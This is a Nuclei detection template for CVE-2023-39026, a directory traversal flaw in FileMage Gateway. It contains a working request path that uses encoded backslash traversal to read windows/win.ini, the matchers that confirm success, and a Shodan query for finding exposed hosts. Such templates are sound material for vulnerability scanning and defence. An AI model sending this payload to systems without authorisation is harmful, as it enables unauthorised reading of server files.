nuclei-templates/http/cves/2023/CVE-2023-39026.yaml

33 lines
1.1 KiB
YAML

id: CVE-2023-39026
info:
name: FileMage Gateway - Directory Traversal
author: DhiyaneshDk
severity: high
description: |
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
reference:
- https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
- https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2023-39026
classification:
cve-id: CVE-2023-39026
metadata:
max-request: 1
verified: true
shodan-query: title:"FileMage"
tags: cve,cve2023,lfi,filemage
http:
- method: GET
path:
- "{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
matchers:
- type: dsl
dsl:
- "contains_all(body,'bit app support','extensions','fonts')"
- "contains(content_type, 'text/plain')"
- "status_code == 200"
condition: and